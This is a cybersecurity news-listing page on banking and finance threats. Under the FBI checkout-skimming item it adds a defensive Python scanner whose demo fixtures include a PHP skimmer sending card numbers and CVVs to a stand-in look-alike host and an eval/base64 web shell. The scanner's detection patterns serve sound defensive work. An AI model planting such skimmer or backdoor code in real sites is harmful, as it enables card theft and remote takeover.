Banking and Finance


  • Huge network of 11,000 fake investment sites targets Europe

    July 31, 2022

    Researchers have uncovered a gigantic network of more than 11,000 domains used to promote numerous fake investment schemes to users in Europe. The platforms show fabricated evidence of enrichment and falsified celebrity endorsements to create an image of legitimacy and lure in a larger number of victims. The goal of the operation is to trick users into ...

  • Weak data protection helped China attack US Federal Reserve, report says

    July 27, 2022

    China’s cyber espionage activities are extensive and sophisticated but when the Middle Kingdom tried to steal sensitive economic data from the US Fed, poor security meant its operatives didn’t have to dip too far into their bags of tricks. Or at least that’s according to the findings of an investigation by the Senate’s Committee on Homeland ...

  • Evilnum hackers return in new operation targeting migration orgs

    June 28, 2022

    The Evilnum hacking group is showing renewed signs of malicious activity, targeting European organizations that are involved in international migration. Evilnum is an APT (advanced persistent threat) that has been active since at least 2018 and had its campaign and tools exposed only recently, in 2020. At that time, ESET published a technical report describing the threat ...

  • Europol: Phishing gang behind several million euros worth of losses busted in Belgium and the Netherlands

    June 21, 2022

    A cross-border operation, supported by Europol and involving the Belgian Police (Police Fédérale/Federale Politie) and the Dutch Police (Politie), resulted in the dismantling of an organised crime group involved in phishing, fraud, scams and money laundering. The action day on 21 June 2022 led to: 9 arrests in the Netherlands; 24 house searches in the Netherlands; seizures including firearms, ...

  • 1.5 million customers impacted by Flagstar Bank data breach

    June 21, 2022

    Flagstar Bank has disclosed a security incident that led to the exposure of personal data belonging to up to 1.5 million customers. As reported by Bleeping Computer, the data breach occurred between December 3 and December 4, 2021. The US financial organization is headquartered in Michigan and operates over 150 branches in areas including Indiana, California, Wisconsin, ...

  • Android-wiping BRATA malware is evolving into a persistent threat

    June 19, 2022

    The threat actor behind BRATA banking trojan has evolved their tactics and improved the malware with information-stealing capabilities. Italian mobile security company Cleafy has been tracking BRATA activity and noticed in the most recent campaigns changes that lead to longer persistence on the device. “The modus operandi now fits into an Advanced Persistent Threat (APT) activity pattern,” ...

  • GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool

    June 13, 2022

    Over the past year, this group has extended its targeting beyond telecommunication companies to also include financial institutions and government entities. During this period, we have identified several connections between GALLIUM infrastructure and targeted entities across Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia and Vietnam. Most importantly, we have also identified the group’s ...

  • Exposing POLONIUM activity and infrastructure targeting Israeli organizations

    June 2, 2022

    Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM. The associated indicators and tactics were used by the OneDrive team to improve detection of attack activity and disable offending actor accounts. To further address this abuse, Microsoft has suspended more ...

  • New ERMAC 2.0 Android malware steals accounts, wallets from 467 apps

    May 26, 2022

    The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto wallets. The goal of the trojan is to send stolen login credentials to threat actors, who then use them to take control of other ...

  • FBI: Cyber Actors Scrape Credit Card Data from US Business’ Online Checkout Page and Maintain Persistence by Injecting Malicious PHP Code

    May 16, 2022

    As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server. The unidentified cyber actors also established backdoor access to the ...
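    The technique in this flash is a server-side skimmer: PHP injected into the checkout handler copies the card fields to an attacker host named to look like the real processor, and a separate backdoor file keeps access. An integrity check against a known-good manifest catches both the modified handler and the dropped file; the indicator patterns below then explain why a flagged file matters. This is an added example written for this page, not code from the FBI flash, and the file names, the `secure-payments-gateway.example` host, and the sample PHP are constructed for the demo.

```python
"""Scan a PHP web root for an injected card skimmer and its backdoor.

Added example (not from the FBI flash). Two checks, combined:
  1. integrity: every .php file is compared with a baseline of SHA-256 hashes
     taken when the site was known to be clean;
  2. content: files are searched for the skimmer pattern (card fields read from
     the request plus an outbound call) and for eval/base64 obfuscation.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Card-holder fields read straight from the request (legitimate checkouts do this too).
CARD_FIELDS = re.compile(
    r"""\$_(?:POST|REQUEST|GET)\s*\[\s*['"](?:card|cc|cvv|cvc|pan|expir)\w*['"]\s*\]""", re.I)
# PHP primitives that can push data to another server.
OUTBOUND = re.compile(
    r"\b(?:curl_init|curl_exec|file_get_contents|fsockopen|stream_socket_client)\s*\(", re.I)
# Obfuscation/execution primitives typical of a dropped web shell.
OBFUSCATION = re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13|assert)\s*\(", re.I)
URL = re.compile(r"https?://[\w.-]+", re.I)


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def file_indicators(text: str) -> list[str]:
    """Names of the skimmer/backdoor patterns present in one PHP source."""
    hits = []
    if CARD_FIELDS.search(text):
        hits.append("reads card fields")
    if OUTBOUND.search(text):
        hosts = sorted(set(URL.findall(text)))
        hits.append("outbound call" + (f" to {', '.join(hosts)}" if hosts else ""))
    if OBFUSCATION.search(text):
        hits.append("eval/base64 obfuscation")
    return hits


def scan_webroot(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Return {relative_path: [reasons]} for every .php file that is new or
    modified relative to the baseline, or that carries a suspicious pattern."""
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        reasons = []
        if rel not in baseline:
            reasons.append("not in baseline")
        elif baseline[rel] != sha256_of(path):
            reasons.append("modified since baseline")
        hits = file_indicators(path.read_text(errors="replace"))
        # Reading card fields alone is normal for a checkout page; the skimmer
        # signature is card fields AND an outbound call, or obfuscated execution.
        suspicious = "eval/base64 obfuscation" in hits or (
            "reads card fields" in hits and any(h.startswith("outbound") for h in hits))
        if reasons or suspicious:
            findings[rel] = reasons + hits
    return findings


# Constructed sample PHP for the demo (not real site code).
CLEAN_CHECKOUT = """<?php
// Legitimate checkout: card data only goes to the local payment library.
$card = $_POST['card_number'];
$cvv  = $_POST['cvv'];
process_payment($card, $cvv);
"""
INJECTED_CHECKOUT = CLEAN_CHECKOUT + """
// Injected skimmer: copies the same fields to a look-alike "processor" host.
$ch = curl_init('https://secure-payments-gateway.example/collect');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['c' => $card, 'v' => $cvv]));
curl_exec($ch);
"""
WEBSHELL = """<?php
// Dropped backdoor: executes whatever the operator posts.
eval(base64_decode($_POST['cmd']));
"""


def build_demo() -> dict[str, list[str]]:
    """Create a clean site, take the baseline, simulate the compromise, scan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "checkout.php").write_text(CLEAN_CHECKOUT)
        (root / "index.php").write_text("<?php echo 'shop';\n")
        baseline = {p.relative_to(root).as_posix(): sha256_of(p) for p in root.rglob("*.php")}
        # Simulated compromise: skimmer appended to the handler, web shell dropped.
        (root / "checkout.php").write_text(INJECTED_CHECKOUT)
        (root / "media").mkdir()
        (root / "media" / "cache.php").write_text(WEBSHELL)
        return scan_webroot(root, baseline)


if __name__ == "__main__":
    for rel, reasons in build_demo().items():
        print(f"{rel}: {'; '.join(reasons)}")
```

    The unchanged `index.php` is not reported, the clean checkout would not be reported on its own, and the two planted files are. In practice the baseline comes from the deployment artifact (package hashes or a git tree), not from the live server, and any outbound host found in a flagged file is checked against the processor's documented endpoints before the site is taken offline.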

  • UK Government hackers made hundreds of thousands of stolen credit cards ‘worthless’ to crooks

    May 10, 2022

    A joint operation involving intelligence agency GCHQ and the Ministry of Defence took direct action against computer networks used by cyber criminals, helping to protect people against cyberattacks and also making hundreds of thousands of stolen credit cards worthless to the crooks who stole them. The action by the National Cyber Force – using the combined ...

  • TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies

    April 18, 2022

    The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Treasury Department (Treasury) are issuing this joint Cybersecurity Advisory (CSA) to highlight the cyber threat associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020. This group is commonly ...

  • Android banking malware intercepts calls to customer support

    April 11, 2022

    A banking trojan for Android that researchers call Fakecalls comes with a powerful capability that enables it to take over calls to a bank’s customer support number and connect the victim directly with the cybercriminals operating the malware. Disguised as a mobile app from a popular bank, Fakecalls displays all the marks of the entity it ...

  • New Android banking malware remotely takes control of your device

    April 9, 2022

    A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud. Octo is an evolved Android malware based on ExoCompact, a malware variant based on the Exo trojan that quit the cybercrime space and had its source code leaked in 2018. The new variant ...

  • Bank had no firewall license, intrusion or phishing protection – guess the rest

    April 5, 2022

    An Indian bank that did not have a valid firewall license, had not employed phishing protection, lacked an intrusion detection system and eschewed use of any intrusion prevention system has, shockingly, been compromised by criminals who made off with millions of rupees. The unfortunate institution is called the Andhra Pradesh Mahesh Co-Operative Urban Bank. Its 45 ...

  • Lazarus Trojanized DeFi app for delivering malware

    March 31, 2022

    For the Lazarus threat actor, financial gain is one of the prime motivations, with a particular emphasis on the cryptocurrency business. As the price of cryptocurrency surges, and the popularity of non-fungible token (NFT) and decentralized finance (DeFi) businesses continues to swell, the Lazarus group’s targeting of the financial industry keeps evolving. We recently discovered a ...

  • Exotic Lily: Exposing initial access broker with ties to Conti

    March 18, 2022

    In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML (CVE-2021-40444). Investigating this group’s activity, we determined they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, ...

  • BNP Paribas bars Russia-based staff from computer systems as cyber attack fears grow

    March 10, 2022

    France’s largest bank BNP Paribas has cut off its Russia-based workforce from its internal computer systems as it seeks to bolster its defences against any potential cyber attack, a source with direct knowledge of the matter told Reuters. The French lender, believed to be the first major bank to have jettisoned staff in Moscow from its ...

  • SharkBot malware hides as Android antivirus in Google Play

    March 5, 2022

    SharkBot banking malware has infiltrated the Google Play Store, the official Android app repository, posing as an antivirus with system cleaning capabilities. Although the trojan app was far from popular, its presence in Play Store shows that malware distributors can still bypass Google’s automatic defenses. The app is still present in Google’s store at the moment ...

  • TeaBot Android Banking Trojan continues its global conquest with new upgrades

    March 2, 2022

    The TeaBot Remote Access Trojan (RAT) has been upgraded, leading to a huge increase in both targets and spread worldwide. On March 1, the Cleafy research team said TeaBot now targets over 400 applications, pivoting from an earlier focus on “smishing” to more advanced tactics. Smishing attacks are used to compromise mobile handsets via spam text messages ...